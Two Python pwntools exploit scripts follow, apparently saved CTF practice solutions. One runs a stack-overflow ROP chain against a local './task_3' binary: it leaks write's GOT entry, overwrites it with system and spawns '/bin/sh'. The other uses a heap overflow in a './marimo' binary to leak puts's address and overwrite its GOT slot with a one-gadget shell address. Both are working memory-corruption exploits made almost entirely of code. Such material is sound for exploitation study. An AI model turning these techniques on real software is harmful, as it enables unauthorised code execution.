from pwn import *

r = process("./task_3")
elf = ELF("./task_3")

# Addresses resolved from the binary. Only `pppr` is a raw constant, so it is
# tied to this exact build of ./task_3 -- presumably a pop/pop/pop/ret gadget
# (inferred from the name only; re-derive it if the binary changes).
read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
pppr = 0x0804855d
bss = elf.bss()
binsh = "/bin/sh\x00"

# Stage 1: 140 bytes of filler (the frame size it matches is not visible in
# this script -- it comes from analysis of the binary), then
# write(1, write_got, 6) so the process prints the resolved libc address held
# in write's GOT slot. The three values after `pppr` are the call arguments.
payload = "\x90"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(6)

# Stage 2: read(0, write_got, 4) overwrites write's GOT slot with the 4 bytes
# sent near the bottom of the script. This depends on the GOT being writable;
# a binary built with full RELRO would make that slot read-only.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

# Stage 3: read(0, bss, 8) stores the 8-byte `binsh` string in .bss.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

# Stage 4: call through write@plt again -- its GOT slot now holds whatever
# stage 2 wrote -- with `bss` as the first argument. The 4 filler bytes occupy
# the return-address slot and are not expected to be used.
payload += p32(write_plt)
payload += "\x90"*4
payload += p32(bss)

# Payloads are str here (Python 2 pwntools); on Python 3 the str/bytes
# concatenation above would need b"" literals.
r.sendline(payload)

# Stage 1 emits 6 bytes but only 4 are consumed here; the remaining 2 stay in
# the receive buffer and will surface later (e.g. inside interactive()).
libc_write = u32(r.recv(4))
# 0x9add0 is the write->system distance of one specific libc build; it must
# match the libc the target actually loads, otherwise stage 4 jumps elsewhere.
libc_system = libc_write - 0x9add0

log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))
r.send(p32(libc_system))  # consumed by stage 2's read(0, write_got, 4)
r.send(binsh)             # consumed by stage 3's read(0, bss, 8)

r.interactive()

exploit code
from pwn import *
import time

def show_me_the_marimo(name, profile):
	"""Create one entry: send the command, then answer the two prompts.

	Uses the module-global connection `r` (set up under __main__). Each
	prompt is echoed to stdout before the next value is sent.
	"""
	r.sendline("show me the marimo")
	for answer in (name, profile):
		print(r.recvuntil(">>"))
		r.sendline(answer)
	print(r.recvuntil(">>"))

def view(select):
	"""Send the "V" menu choice, echo the prompt, then submit `select`.

	Uses the module-global connection `r` (set up under __main__).
	"""
	r.sendline("V")
	prompt = r.recvuntil(">>")
	print(prompt)
	r.sendline(select)

if __name__ == "__main__":
	# Python 2 script: print statements and str payloads throughout.
	binary = "./marimo"
	elf = ELF(binary)
	# `r` is a module global; show_me_the_marimo() and view() read it directly.
	r = process(binary)

	#strcmp_got = elf.got['strcmp']
	puts_got = elf.got['puts']

	print r.recvuntil(">>")

	# Two entries are created before entry 0 is modified below.
	show_me_the_marimo("A"*4, "B"*4)
	show_me_the_marimo("C"*4, "D"*4)

	# 3-second wait before the modification; the reason is not visible in this
	# script (presumably target-side timing -- confirm against the binary).
	time.sleep(3)
	# 72-byte payload: 52 bytes of filler, a 4-byte zero, then two 8-byte
	# pointers to puts's GOT slot. The layout this matches (presumably the
	# neighbouring entry 1, given the "view 1" read below) is not visible here.
	payload = "A"*52
	payload += p32(0x0)
	payload += p64(puts_got)
	#payload += p64(strcmp_got)
	payload += p64(puts_got)

	# Select entry 0, send "M" and the payload, then "B". The menu letters'
	# meanings are not visible in this script.
	view("0")
	print r.recvuntil(">>")
	r.sendline("M")
	print r.recvuntil(">>")
	r.sendline(payload)
	#pause()
	print r.recvuntil(">>")
	r.sendline("B")
	print r.recvuntil(">>")

	# Viewing entry 1 prints a "name : " field; the 6 bytes read from it are
	# treated as a little-endian x86-64 address and zero-padded to 8 bytes.
	# Presumably the field now points at puts's GOT slot via the payload above
	# -- confirm against the binary.
	view("1")
	print r.recvuntil("name : ")
	libc_puts = u64(r.recv(6).ljust(8, "\x00"))

	print r.recvuntil(">>")
	log.info("libc_puts = {}".format(hex(libc_puts)))
	# 0x2a47a is a libc-build-specific distance; it must match the libc the
	# target actually loads, otherwise the computed address is wrong.
	libc_oneshot = libc_puts - 0x2a47a
	log.info("oneshot = {}".format(hex(libc_oneshot)))
	# "M" on entry 1 followed by the 8-byte value; this write only lands in the
	# GOT if that slot is writable (i.e. the binary lacks full RELRO).
	r.sendline("M")
	print r.recvuntil(">>")
	#pause()
	r.sendline(p64(libc_oneshot))
	#pause()

	r.interactive()




헷갈릴 때 마다 봐야지 ㅎㅎ

